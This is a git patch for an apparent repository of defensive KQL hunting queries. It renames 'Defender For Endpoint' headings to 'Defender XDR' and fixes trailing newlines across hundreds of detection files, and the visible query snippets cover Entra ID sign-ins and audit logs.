From 1b6dca8b4c2c404c1bb57578ea93be61ae8256e1 Mon Sep 17 00:00:00 2001 
From: Bert-Janp Date: Sun, 20 Oct 2024 15:36:52 +0200 Subject: [PATCH] Template Update --- Azure Active Directory/AllGraphPermissionsAdded.md | 2 +- Azure Active Directory/GraphMailPermissions.md | 2 +- Azure Active Directory/GroupMembershipReport.md | 2 +- .../MonitorCloudBreakGlassAccount.md | 2 +- Azure Active Directory/MultipleAccountsLocked.md | 2 +- Azure Active Directory/NewAuthenticationAppDetected.md | 2 +- Azure Active Directory/NewUserAgentUsed.md | 2 +- Azure Active Directory/PotentialAiTMPhishing.md | 4 ++-- Azure Active Directory/RoleReport.md | 2 +- Azure Active Directory/SignInFromSuspiciousIP.md | 2 +- Azure Active Directory/SignInsByBrowser.md | 2 +- Azure Active Directory/SignInsByOS.md | 2 +- Azure Active Directory/SignInsByUserAgent.md | 2 +- .../SuccessfulSignInFromNewCountry.md | 2 +- .../Top10UsersWithTheMostSignInIPsUsed.md | 2 +- .../TopNAccountsLongestPeriodWithoutPasswordReset.md | 2 +- .../TotalAllGraphPermissionsAdded.md | 2 +- ...tion - AccountsLongestPeriodWithoutPasswordReset.md | 2 +- ...pider_abuse conditional_access_trusted_locations.md | 2 +- Azure Resource Graph/README.md | 2 +- Cloud Audit Events/CloudResourceDeletion.md | 4 ++-- .../MDE - AllProcessesCreatedByMaliciousFile.md | 2 +- ...MDE - Antivirus-Detections-by-Compromised-Device.md | 2 +- ...DE - BrowserLaunchedToOpenUrlByCompromisedDevice.md | 2 +- ... 
- Connections-Made-By-Office-Compromised-Device.md | 2 +- .../MDE - FileEnrichmentOnSuspiciousFile.md | 2 +- DFIR/Defender For Endpoint/MDE - IPLookup.md | 2 +- .../MDE - InboundConnectionsCompromisedDevice.md | 2 +- ...MDE - InternalConnectionsMadeByCompromisedDevice.md | 2 +- ...MD365-EmailAttachmentsSendFromCompromisedMailbox.md | 2 +- ...ostRecentPowershellExecutionsByCompromisedDevice.md | 2 +- DFIR/Defender For Endpoint/MDE - NetActivities.md | 2 +- ...MDE - Open-SMB-Connections-By-Compromised-Device.md | 2 +- .../MDE - Registry-Run-Keys-Forensics.md | 2 +- .../MDE - TriggeredASREventsFromCompromisedDevice.md | 2 +- DFIR/Defender For Endpoint/MDE - URLLookup.md | 2 +- ...MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md | 2 +- DFIR/Defender For Identity/MDI - ADGroupAdditions.md | 2 +- .../MDI - Devices-Accessed-By-Compromised-Device.md | 2 +- .../MDI - LDAPQueriesByCompromisedDevice.md | 2 +- .../MDI - Lateral-Movement-By-Compromised-Accounts.md | 2 +- ...MD365-EmailAttachmentsSendFromCompromisedMailbox.md | 2 +- DFIR/Defender For Office/MDO- FindRelatedMails.md | 2 +- .../ExposureManagement - DeviceActivities.md | 2 +- DFIR/ExposureManagement - DeviceActivities.md | 2 +- DFIR/MDE - AllProcessesCreatedByMaliciousFile.md | 2 +- ...MDE - Antivirus-Detections-by-Compromised-Device.md | 2 +- ...DE - BrowserLaunchedToOpenUrlByCompromisedDevice.md | 2 +- ... 
- Connections-Made-By-Office-Compromised-Device.md | 2 +- DFIR/MDE - FileEnrichmentOnSuspiciousFile.md | 2 +- DFIR/MDE - IPLookup.md | 2 +- DFIR/MDE - InboundConnectionsCompromisedDevice.md | 2 +- ...MDE - InternalConnectionsMadeByCompromisedDevice.md | 2 +- ...MD365-EmailAttachmentsSendFromCompromisedMailbox.md | 2 +- ...ostRecentPowershellExecutionsByCompromisedDevice.md | 2 +- DFIR/MDE - NetActivities.md | 2 +- ...MDE - Open-SMB-Connections-By-Compromised-Device.md | 2 +- DFIR/MDE - Registry-Run-Keys-Forensics.md | 2 +- DFIR/MDE - TriggeredASREventsFromCompromisedDevice.md | 2 +- DFIR/MDE - URLLookup.md | 2 +- ...MDE - UrlsOpenedWithOutlookFromCompromisedDevice.md | 2 +- DFIR/MDI - ADGroupAdditions.md | 2 +- DFIR/MDI - Devices-Accessed-By-Compromised-Device.md | 2 +- DFIR/MDI - LDAPQueriesByCompromisedDevice.md | 2 +- DFIR/MDI - Lateral-Movement-By-Compromised-Accounts.md | 2 +- DFIR/MDO- FindRelatedMails.md | 2 +- Defender For Cloud Apps/ATPDetectionEvents.md | 2 +- .../AccountsWithMostImpersonatedActions.md | 2 +- Defender For Cloud Apps/AnonymousProxyEvents.md | 2 +- Defender For Cloud Apps/DefenseEvasionAlerts.md | 2 +- Defender For Cloud Apps/ExternalAdminActivities.md | 2 +- .../FileContainingMalwareDetected.md | 2 +- Defender For Cloud Apps/HardUserDelete.md | 4 ++-- Defender For Cloud Apps/MITREBehaviors.md | 4 ++-- .../MaliciousEmailDeliveredInMailbox.md | 2 +- Defender For Cloud Apps/MostImpersonatorsByAccount.md | 2 +- Defender For Cloud Apps/OneDriveSyncFromRareIP.md | 2 +- Defender For Cloud Apps/RiskyIPActivities.md | 2 +- Defender For Cloud Apps/SupressionRuleCreations.md | 2 +- .../Visualization - ActionsPerformed.md | 2 +- .../Visualization - HardDeletionsByUser.md | 2 +- .../Visualization - OperationsPerformed.md | 2 +- .../Visualization - OutdatedOSUsed.md | 2 +- Defender For Endpoint/AMSIScriptDetections.md | 4 ++-- .../ASR Rules/ASR-RulesTriggeredByDevice.md | 2 +- .../ASR Rules/AsrExecutableOfficeContent.md | 4 ++-- Defender For 
Endpoint/ASR Rules/AsrRansomware.md | 2 +- Defender For Endpoint/ASR Rules/Pivot - ASRConfig.md | 2 +- Defender For Endpoint/ASR Rules/Pivot - ASRTriggers.md | 2 +- Defender For Endpoint/AnomalousSMBSessionsCreated.md | 2 +- Defender For Endpoint/BloodHoundProcessDetection.md | 2 +- Defender For Endpoint/CommandlineGroupAddition.md | 4 ++-- Defender For Endpoint/CommandlineUserAddition.md | 4 ++-- .../CommandlineWithClearTextPassword.md | 4 ++-- Defender For Endpoint/DefenderDiscoveryActivities.md | 4 ++-- .../Detect_Known_RAT_RMM_Process_Patterns.md | 2 +- Defender For Endpoint/DevicesWithMostSMBConnections.md | 2 +- Defender For Endpoint/DevicesWithTheMostSMBSessions.md | 2 +- Defender For Endpoint/Discovery - DatabaseServices.md | 2 +- Defender For Endpoint/ExecutableFilesPublicFolder.md | 4 ++-- Defender For Endpoint/ExploitGuardNetworkProtection.md | 4 ++-- Defender For Endpoint/HTTPDownloadsByFileExtention.md | 2 +- Defender For Endpoint/HTTPExecutableFilesDownloaded.md | 2 +- Defender For Endpoint/HTTPRequestMethodsStatistics.md | 2 +- Defender For Endpoint/LatestAntivirusScanStatus.md | 4 ++-- .../Linux/Linux - UsersAddedToSudoersGroup.md | 2 +- Defender For Endpoint/ListTamperingAttempts.md | 4 ++-- .../Living Off The Land/CertutilRemoteDownload.md | 4 ++-- .../Living Off The Land/LOLBinRemoteIPCommandLine.md | 2 +- .../Living Off The Land/LOLBinStatistics.md | 2 +- .../Living Off The Land/LOLDriverUsage.md | 2 +- Defender For Endpoint/Living Off The Land/LOTSUsage.md | 4 ++-- .../Living Off The Land/NewLOLBinExternalConnection.md | 2 +- .../Living Off The Land/RMMConnection.md | 2 +- .../Living Off The Land/WMICRemoteCommand.md | 2 +- Defender For Endpoint/LocalAccountCreated.md | 2 +- Defender For Endpoint/LocalAdminAdditions.md | 4 ++-- .../LocalAdminsWithTheMostDevicesAccessed.md | 2 +- Defender For Endpoint/LocalFirewallAdditions.md | 2 +- Defender For Endpoint/LocalFirewallDeletions.md | 2 +- Defender For Endpoint/LocalGroupCreation.md | 4 ++-- 
Defender For Endpoint/LocalGroupDiscovery.md | 4 ++-- .../MultipleSentitiveGroupAdditions.md | 4 ++-- Defender For Endpoint/NTDSDitFileModifications.md | 2 +- Defender For Endpoint/NetDiscoveryActivities.md | 4 ++-- .../NetDiscoveryActivitiesDetected.md | 4 ++-- Defender For Endpoint/NetQueryStatistics.md | 4 ++-- .../Network - AnyDeskConnectionToPublicIP.md | 2 +- .../Network - DevicesWithMostOpenPorts.md | 2 +- .../Network - InterestingOpenPorts.md | 2 +- Defender For Endpoint/Network - OpenDatabasePorts.md | 2 +- .../Network - OpenRemoteServicePorts.md | 2 +- Defender For Endpoint/NewRDPConnections.md | 2 +- Defender For Endpoint/NewSysinternalToolDetected.md | 2 +- Defender For Endpoint/NltestDiscovery.md | 2 +- Defender For Endpoint/OutboundConhostConnection.md | 4 ++-- Defender For Endpoint/PSExecExecutions.md | 4 ++-- .../PowerShellEncodedCommandsByDevice.md | 2 +- .../PowerShellEncodedCommandsExecuted.md | 2 +- .../PowerShellEncodedReconActivities.md | 2 +- Defender For Endpoint/PowerShellEncodedWebRequests.md | 2 +- Defender For Endpoint/PowerShellInvokeWebrequest.md | 4 ++-- Defender For Endpoint/PowerShellNoProfile.md | 4 ++-- Defender For Endpoint/PublicFacingDeviceScanned.md | 2 +- .../QakbotPostCompromiseCommandsExecuted.md | 2 +- .../Ransomware/KillNetRansomwareDetection.md | 2 +- .../Ransomware/RansomwareDoubleExtention.md | 2 +- .../Ransomware/RansomwareExtensionFound.md | 2 +- .../Ransomware/RansomwareNoteFound.md | 2 +- Defender For Endpoint/RareConnectionsMadeByOffice.md | 2 +- Defender For Endpoint/RareISOFile.md | 4 ++-- Defender For Endpoint/RareNetParamaterExecutions.md | 4 ++-- .../Rare_Outgoing_IPv4_Connections.md | 2 +- .../Regsvr32StartedByOfficeApplication.md | 2 +- Defender For Endpoint/RemoteSMBConnection.md | 2 +- Defender For Endpoint/RunasWithSavedCredentials.md | 4 ++-- Defender For Endpoint/SMBSessionsByDevice.md | 2 +- Defender For Endpoint/SMBSessionsByFileName.md | 2 +- Defender For Endpoint/SMBSessionsGeneratedByFile.md | 2 
+- Defender For Endpoint/SecurityLogCleared.md | 4 ++-- Defender For Endpoint/ShadowCopyDeletion.md | 2 +- Defender For Endpoint/SmartScreen/SmartScreenEvents.md | 2 +- .../SmartScreen/SmartScreenOverride.md | 2 +- Defender For Endpoint/USB/ConnectedPnPTypes.md | 4 ++-- Defender For Endpoint/USB/USBConnectors.md | 4 ++-- .../Visualizations/Visualization - FileTypes.md | 2 +- .../Visualization - InspectedNetworkSignatures.md | 2 +- .../Visualization - LogonFailureReasons.md | 2 +- .../Visualization - SysinternalToolUsage.md | 2 +- .../Visualization - UnauthorizedLogonsByAccount.md | 2 +- .../Visualization- DefenderMachineGroups.md | 2 +- Defender For Endpoint/WMICAntivirusDiscovery.md | 2 +- Defender For Endpoint/WebshellDetection.md | 2 +- Defender For Endpoint/WevtutilClearLogs.md | 4 ++-- Defender For Endpoint/WindowsNetworkSniffing.md | 2 +- ..._ttp_t1543_peach-sandstorm_azure_arc_persistence.md | 2 +- .../ttp_t1027-010_powershellEncodedCommand.md | 2 +- .../ttp_t1059-001_powershell_windowsappsdir_fin7.md | 2 +- .../ttp_t1127-001_suspNetworkConnMSBuild.md | 2 +- Defender For Endpoint/ttp_t1219_netsupportrat_fin7.md | 2 +- Defender For Endpoint/ttp_t1562-001_disabledefender.md | 2 +- .../AccountWithPasswordNeverExpiresEnabled.md | 2 +- Defender For Identity/AnomalousGroupPolicyDiscovery.md | 2 +- Defender For Identity/AnomalousLDAPTraffic.md | 4 ++-- ...wLateralMovementPathToSensitiveAccountIdentified.md | 2 +- .../PasswordChangeAfterSuccesfulBruteForce.md | 4 ++-- .../PotentialKerberosEncryptionDowngrade.md | 4 ++-- Defender For Identity/SMBFileCopy.md | 2 +- Defender For Identity/UserAddedToSensitiveGroup.md | 2 +- .../Visualization - ClearTextLDAPSignIns.md | 2 +- .../Visualization - MostInteractiveSignInsByUser.md | 2 +- Defender XDR/AlertSupressionAdded.md | 4 ++-- Defender XDR/CustomDetectionDeletion.md | 4 ++-- Defender XDR/CustomDetectionReport.md | 2 +- Defender XDR/DeviceIsolation.md | 4 ++-- Defender XDR/DeviceRemovedFromIsolation.md | 4 ++-- Defender 
XDR/LiveResponseFileCollection.md | 4 ++-- Defender XDR/LiveResponseUnsignedPowerShellChanges.md | 4 ++-- Defender XDR/ManualAntivirusScans.md | 4 ++-- Defender XDR/OffboardingPackageDownloaded.md | 4 ++-- Defender XDR/RBACChanges.md | 4 ++-- DetectionTemplate.md | 2 +- Exposure Management/MostPermissiveEntities.md | 4 ++-- Fun/KQLQueryVisits.md | 4 ++-- Fun/KQLSearchVisits.md | 4 ++-- Fun/MailItemsAccessed.md | 2 +- Fun/TeamsEmojiReactions.md | 4 ++-- Fun/TeamsEmojiReactionsByDepartment.md | 4 ++-- Functions/CollectIncidentStatistics.md | 2 +- Functions/DeviceCommandLinePublicIPs.md | 4 ++-- Functions/IsDomainController.md | 2 +- Functions/LastPowerShellExecutions.md | 2 +- Functions/ListAllActionsAndOperations.md | 2 +- Functions/ListCISAExploitedVulnerabilites.md | 4 ++-- Functions/ListDomainControllers.md | 2 +- Functions/UserRiskStatus.md | 2 +- .../AppEnrichmentAADNonInteractiveUserSignInLogs.md | 2 +- Graph API/AppEnrichmentExternalData.md | 2 +- Graph API/AzureHound.md | 2 +- Graph API/GraphResourceAPIRequestStats.md | 2 +- Graph API/GraphURIAPIRequestStats.md | 2 +- Graph API/IPEnrichment.md | 2 +- Graph API/UserEnrichment.md | 2 +- KQL Regex/RegexExamples.md | 2 +- Log Analytics/LogAnalyticsQueryStatistics.md | 2 +- MISP/MISP Feed Implementation Status/README.md | 2 +- MISP/README.md | 4 ++-- Office 365/AnomalousAmountofURLClickEvents.md | 2 +- Office 365/Email - ASRExecutableContentTriggered.md | 4 ++-- Office 365/Email - ExecutableFileRecieved.md | 2 +- Office 365/Email - ISOAttachmentRecieved.md | 4 ++-- .../Email - MacroAttachmentOpenedFromRareSender.md | 4 ++-- Office 365/Email - MostRareFileExtensionsRecieved.md | 4 ++-- Office 365/Email - PotentialPhishingCampaign.md | 4 ++-- Office 365/Email - SafeLinksTrigger.md | 4 ++-- Office 365/ListSafeLinkEvents.md | 2 +- .../Visualization - Email - MalwareDetectionReasons.md | 4 ++-- .../Visualization - Email - PhishDetectionReasons.md | 4 ++-- .../Visualization - Email - PostDeliveryEvents.md | 4 ++-- 
README.md | 2 +- Security Operations/ComparisonIntuneandMDEDevices.md | 2 +- Security Operations/DevicesCanBeOnboarded.md | 4 ++-- Security Operations/OnboardedDeviceByOS.md | 4 ++-- Security Operations/README.md | 2 +- .../Statistics - MostTriggeredIncidents.md | 4 ++-- .../Statistics - MostTriggeredMitreTechniques.md | 4 ++-- Security Operations/TotalEventsByTable.md | 2 +- .../Visualization - AntivirusEventsByDay.md | 2 +- .../Visualization - DailyIncidentTriggers.md | 4 ++-- .../Visualization - DailyTableEvents.md | 4 ++-- .../Visualization - ThreatIntelligenceThreatTypes.md | 2 +- Security Operations/XDRAutomaticallyClosedIncidents.md | 2 +- SecurityEvents/NltestDiscovery.md | 2 +- Sentinel/AnalyticsRulesEfficiency.md | 2 +- Sentinel/ListGlobalAdmins.md | 2 +- Sentinel/SentinelAnomalies.md | 2 +- Sentinel/Summary Rules/AzureHound.md | 2 +- Sentinel/Summary Rules/EntraGroupMembershipReport.md | 2 +- Sentinel/Summary Rules/EntraRolesReport.md | 2 +- Sentinel/Summary Rules/README.md | 2 +- Sentinel/Summary Rules/UniqueActions.md | 2 +- .../Visualization - IncidentsTriggeredByMitreTactic.md | 2 +- ...ualization - IncidentsTriggeredByMitreTechniques.md | 2 +- Threat Hunting Cases/HTTP Traffic.md | 10 +++++----- Threat Hunting Cases/Suspicious Encoded Powershell.md | 8 ++++---- Threat Hunting Cases/Suspicious SMB Sessions.md | 10 +++++----- Threat Hunting/Behavior - AsyncRATInitialAccess.md | 2 +- .../Behavior - InboundConnectionFromMaliciousIP.md | 2 +- Threat Hunting/Behavior - TelegramC2.md | 2 +- Threat Hunting/Behaviour - APT28Commands.md | 4 ++-- Threat Hunting/Behaviour - APT28ExternalWebdav.md | 4 ++-- Threat Hunting/Behaviour - KillSQLProcesses.md | 4 ++-- Threat Hunting/IOC - BlackCatRansomware.md | 2 +- Threat Hunting/IOC - CiscoYanluowangRansomware.md | 2 +- Threat Hunting/IOC - NighthawkRat.md | 2 +- Threat Hunting/Ransomware - APTNotesJoinTable.md | 4 ++-- Threat Hunting/Ransomware - APTNotesSHA1IOC.md | 4 ++-- Threat Hunting/Ransomware - 
LeaksiteMontitoring.md | 2 +- Threat Hunting/STORM-0539 URLPathsEmail.md | 4 ++-- Threat Hunting/TI Feed - 2022-TalosEmotetDomain.md | 2 +- Threat Hunting/TI Feed - 2022-TalosEmotetSHA256.md | 2 +- Threat Hunting/TI Feed - AbuseCHBotnetC2Indicators.md | 4 ++-- Threat Hunting/TI Feed - AbuseCHIPBlacklistFeed.md | 2 +- Threat Hunting/TI Feed - AbuseCHMD5Malware.md | 4 ++-- Threat Hunting/TI Feed - BlocklistDEAllMaliciousIP.md | 4 ++-- Threat Hunting/TI Feed - C2IPFeed.md | 2 +- Threat Hunting/TI Feed - C2URLFeed.md | 2 +- Threat Hunting/TI Feed - C2URLFeedFilterAbuse.md | 2 +- Threat Hunting/TI Feed - CERT-FR-MISPFeed.md | 2 +- Threat Hunting/TI Feed - DigitalSideDomains.md | 4 ++-- Threat Hunting/TI Feed - DigitalSideIPs.md | 4 ++-- Threat Hunting/TI Feed - JA3Blacklist.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 4.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 5.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 6.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 7.md | 2 +- Threat Hunting/TI Feed - MISP IPSum level 8.md | 2 +- .../TI Feed - MontySecurity C2 Tracker All IPs.md | 2 +- Threat Hunting/TI Feed - ThreatfoxMalwareDomains.md | 4 ++-- ...I Feed - ThreatviewioDomain-High-Confidence-Feed.md | 2 +- .../TI Feed - ThreatviewioIP-High-Confidence-Feed.md | 2 +- Threat Hunting/TI Feed - TwitterIOCs.md | 2 +- Threat Hunting/TI Feed - ipfs_phishing.md | 2 +- Windows Security Events/ListADDelegations.md | 2 +- Zero Day Detection/MS Exchange Zero Day Sept 2022.md | 2 +- 305 files changed, 397 insertions(+), 397 deletions(-) diff --git a/Azure Active Directory/AllGraphPermissionsAdded.md b/Azure Active Directory/AllGraphPermissionsAdded.md index 5ded9bc..40f66b5 100644 --- a/Azure Active Directory/AllGraphPermissionsAdded.md +++ b/Azure Active Directory/AllGraphPermissionsAdded.md 
@@ -32,4 +32,4 @@ AuditLogs | extend ServicePrincipalAppId = replace_string(tostring(todynamic(TargetResources).modifiedProperties[5].newValue),'"','') | where AddedPermission endswith ".All" | project-reorder TimeGenerated, InitiatedByUserPrincipalName, ActivityDisplayName, AddedPermission, IP, ServicePrincipalAppId -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/GraphMailPermissions.md b/Azure Active Directory/GraphMailPermissions.md index 8d74919..52e4763 100644 --- a/Azure Active Directory/GraphMailPermissions.md +++ b/Azure Active Directory/GraphMailPermissions.md @@ -36,4 +36,4 @@ AuditLogs | extend TotalPermissions = array_length(Permissions) | project TotalPermissions, ServicePrincipalAppId, InitiatedByUserPrincipalName, IP, Permissions | sort by TotalPermissions -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/GroupMembershipReport.md b/Azure Active Directory/GroupMembershipReport.md index 872b240..69f1401 100644 --- a/Azure Active Directory/GroupMembershipReport.md +++ b/Azure Active Directory/GroupMembershipReport.md @@ -28,4 +28,4 @@ IdentityInfo | where isnotempty(GroupMembership) | summarize TotalMemberships = dcount(tostring(GroupMembership)), MemberOf = make_set(tostring(GroupMembership), 1000) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/MonitorCloudBreakGlassAccount.md b/Azure Active Directory/MonitorCloudBreakGlassAccount.md index c42d8ca..5697f55 100644 --- a/Azure Active Directory/MonitorCloudBreakGlassAccount.md +++ b/Azure Active Directory/MonitorCloudBreakGlassAccount.md @@ -11,7 +11,7 @@ If an attacker could get access to a break glass account, this account could be #### Author - **Github: https://github.com/erikgruetter** -## Defender For Endpoint +## Defender XDR ``` AADSignInEventsBeta | where AccountDisplayName == "Input display name of account here" 
diff --git a/Azure Active Directory/MultipleAccountsLocked.md b/Azure Active Directory/MultipleAccountsLocked.md index 99c10b7..51258bc 100644 --- a/Azure Active Directory/MultipleAccountsLocked.md +++ b/Azure Active Directory/MultipleAccountsLocked.md @@ -29,4 +29,4 @@ SigninLogs | where TotalAccounts >= Threshold | extend GeoIPInfo = geo_info_from_ip_address(IPAddress) | extend country = tostring(parse_json(GeoIPInfo).country), state = tostring(parse_json(GeoIPInfo).state), city = tostring(parse_json(GeoIPInfo).city) -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/NewAuthenticationAppDetected.md b/Azure Active Directory/NewAuthenticationAppDetected.md index 97c113f..bc2603a 100644 --- a/Azure Active Directory/NewAuthenticationAppDetected.md +++ b/Azure Active Directory/NewAuthenticationAppDetected.md @@ -20,7 +20,7 @@ A malicious actor installs a malicious app in your environment. This app can the - https://learn.microsoft.com/en-us/security/compass/incident-response-playbook-compromised-malicious-app - https://www.lares.com/blog/malicious-azure-ad-application-registrations/ -## Defender For Endpoint +## Defender XDR ```KQL let KnownApps = AADSignInEventsBeta // Adjust the timerange depending on the retention period diff --git a/Azure Active Directory/NewUserAgentUsed.md b/Azure Active Directory/NewUserAgentUsed.md index c40c9f0..5149b08 100644 --- a/Azure Active Directory/NewUserAgentUsed.md +++ b/Azure Active Directory/NewUserAgentUsed.md @@ -10,7 +10,7 @@ False positives can be new browser updates that trigger new UserAgents, this wil #### Risk A malicious actor signs in to your tenant with a user agent that is not user in your environment. It can also be a script that uses (leaked) credentials on your tentant. -## Defender For Endpoint +## Defender XDR ```KQL let KnownUserAgents = AADSignInEventsBeta | where Timestamp > ago(30d) and Timestamp < ago(3d) 
diff --git a/Azure Active Directory/PotentialAiTMPhishing.md b/Azure Active Directory/PotentialAiTMPhishing.md index 4fc7dcc..6a5a5d4 100644 --- a/Azure Active Directory/PotentialAiTMPhishing.md +++ b/Azure Active Directory/PotentialAiTMPhishing.md @@ -21,7 +21,7 @@ Adversary in the middle phishing has successfully been peformed on a user and th - https://techcommunity.microsoft.com/t5/azure-data-explorer-blog/aitm-amp-bec-threat-hunting-with-kql/ba-p/3885166 - https://jeffreyappel.nl/aitm-mfa-phishing-attacks-in-combination-with-new-microsoft-protections-2023-edt/ -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | where Application == "OfficeHome" @@ -41,4 +41,4 @@ SigninLogs | summarize RiskLevels = make_set(RiskLevelDuringSignIn), ResultTypes = make_set(ResultType), IPs = make_set(IPAddress) by CorrelationId, UserPrincipalName // Optional to only filter on events with a RiskLevel during the sign-in //| where RiskLevels has_any ("low", "medium", "high") -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/RoleReport.md b/Azure Active Directory/RoleReport.md index deaa8df..16c389b 100644 --- a/Azure Active Directory/RoleReport.md +++ b/Azure Active Directory/RoleReport.md @@ -28,4 +28,4 @@ IdentityInfo | summarize TotalRoles = dcount(tostring(AssignedRoles)), MemberOf = make_set(tostring(AssignedRoles), 1000) by AccountObjectId, AccountDisplayName, AccountUPN | extend ReportDate = now() | sort by TotalRoles desc -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/SignInFromSuspiciousIP.md b/Azure Active Directory/SignInFromSuspiciousIP.md index 546d96d..dc77da5 100644 --- a/Azure Active Directory/SignInFromSuspiciousIP.md +++ b/Azure Active Directory/SignInFromSuspiciousIP.md @@ -24,4 +24,4 @@ let IPs = ThreatIntelligenceIndicator SigninLogs | where IPAddress in (IPs) | project TimeGenerated, UserPrincipalName, IPAddress, Location -``` \ No newline at end of file +``` 
diff --git a/Azure Active Directory/SignInsByBrowser.md b/Azure Active Directory/SignInsByBrowser.md index efdb405..94311f7 100644 --- a/Azure Active Directory/SignInsByBrowser.md +++ b/Azure Active Directory/SignInsByBrowser.md @@ -6,7 +6,7 @@ This query lists all the different browsers that are used to succesfully sign in to your Entra ID Tenant. This could be used to detect rare browsers that are used to sign into your tenant. -## Defender For Endpoint +## Defender XDR ```KQLAADSignInEventsBeta | where isnotempty(UserAgent) // Filter for successful sign ins only diff --git a/Azure Active Directory/SignInsByOS.md b/Azure Active Directory/SignInsByOS.md index edf3cc6..1cb552b 100644 --- a/Azure Active Directory/SignInsByOS.md +++ b/Azure Active Directory/SignInsByOS.md @@ -7,7 +7,7 @@ This query can be used to detect rare operating systems that are used to sign in This query can also be used to determine with Operting Systems need to be added to your Conditional Access Policies. -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | where isnotempty(UserAgent) diff --git a/Azure Active Directory/SignInsByUserAgent.md b/Azure Active Directory/SignInsByUserAgent.md index 597b3cd..ae727bf 100644 --- a/Azure Active Directory/SignInsByUserAgent.md +++ b/Azure Active Directory/SignInsByUserAgent.md @@ -7,7 +7,7 @@ This query can be used to detect rare UserAgents that are used to sign into your The query can be extended by filtering on succesful and failed sign ins. -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | summarize count() by UserAgent diff --git a/Azure Active Directory/SuccessfulSignInFromNewCountry.md b/Azure Active Directory/SuccessfulSignInFromNewCountry.md index 41ab10a..0d2d176 100644 --- a/Azure Active Directory/SuccessfulSignInFromNewCountry.md +++ b/Azure Active Directory/SuccessfulSignInFromNewCountry.md 
@@ -8,7 +8,7 @@ This query detects successful signins from countries that have not been seen bef #### Risk An adversary signs in from a new country to your azure AD tenant. -## Defender For Endpoint +## Defender XDR ```KQL let KnownCountries = AADSignInEventsBeta | where Timestamp > ago(30d) and Timestamp < ago(3d) diff --git a/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md b/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md index 2dcd60e..e6820b1 100644 --- a/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md +++ b/Azure Active Directory/Top10UsersWithTheMostSignInIPsUsed.md @@ -10,7 +10,7 @@ False positives can be a VPN that changes IP addresses, which results in a high #### Risk The risk is that an actor uses an rare IP address to sign into your tenant. -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | summarize IPsUsed = make_set(IPAddress), locations = make_set(Country) by AccountObjectId diff --git a/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md b/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md index 0e11aa7..375ec57 100644 --- a/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md +++ b/Azure Active Directory/TopNAccountsLongestPeriodWithoutPasswordReset.md @@ -11,7 +11,7 @@ If a password has not been changed for years, it might be that the account does #### References - https://learn.microsoft.com/en-us/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL let LatestNChanges = 100; AADSignInEventsBeta diff --git a/Azure Active Directory/TotalAllGraphPermissionsAdded.md b/Azure Active Directory/TotalAllGraphPermissionsAdded.md index 60a3023..d0bb3ea 100644 --- a/Azure Active Directory/TotalAllGraphPermissionsAdded.md +++ b/Azure Active Directory/TotalAllGraphPermissionsAdded.md 
@@ -30,4 +30,4 @@ AuditLogs | extend TotalPermissions = array_length(Permissions) | project TotalPermissions, ServicePrincipalAppId, InitiatedByUserPrincipalName, IP, Permissions | sort by TotalPermissions -``` \ No newline at end of file +``` diff --git a/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md b/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md index 6194bc3..aaf8695 100644 --- a/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md +++ b/Azure Active Directory/Visualization - AccountsLongestPeriodWithoutPasswordReset.md @@ -11,7 +11,7 @@ If a password has not been changed for years, it might be that the account does #### References - https://learn.microsoft.com/en-us/microsoft-365/admin/misc/password-policy-recommendations?view=o365-worldwide -## Defender For Endpoint +## Defender XDR ```KQL AADSignInEventsBeta | where Timestamp > ago(30d) diff --git a/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md b/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md index ef6cda0..1cb6548 100644 --- a/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md +++ b/Azure Active Directory/nf_ttp_t1562.001_scattered-spider_abuse conditional_access_trusted_locations.md @@ -25,7 +25,7 @@ The risk addressed here is the manipulation of access controls to evade detectio - [Microsoft Documentation on Conditional Access Policies](https://docs.microsoft.com/en-us/azure/active-directory/conditional-access/) - [MITRE ATT&CK on Defense Evasion](https://attack.mitre.org/tactics/TA0005/) -## Defender For Endpoint +## Defender XDR ```KQL AuditLogs | where OperationName =~ "Update conditional access policy" and TargetResources has_all ('locations','excludeLocations') 
diff --git a/Azure Resource Graph/README.md b/Azure Resource Graph/README.md index 4380df6..29d8da7 100644 --- a/Azure Resource Graph/README.md +++ b/Azure Resource Graph/README.md @@ -52,4 +52,4 @@ Microsoft has provided various KQL examples that can be used in your environment When using the docs, select portal to get the KQL queries as marked below. -![Azure Resource Graph Docs](Images/Portal.png) \ No newline at end of file +![Azure Resource Graph Docs](Images/Portal.png) diff --git a/Cloud Audit Events/CloudResourceDeletion.md b/Cloud Audit Events/CloudResourceDeletion.md index bb50a5b..1729001 100644 --- a/Cloud Audit Events/CloudResourceDeletion.md +++ b/Cloud Audit Events/CloudResourceDeletion.md @@ -17,7 +17,7 @@ An actor deletes multiple cloud resources to create impact. #### References - https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-cloudauditevents-table -## Defender For Endpoint +## Defender XDR 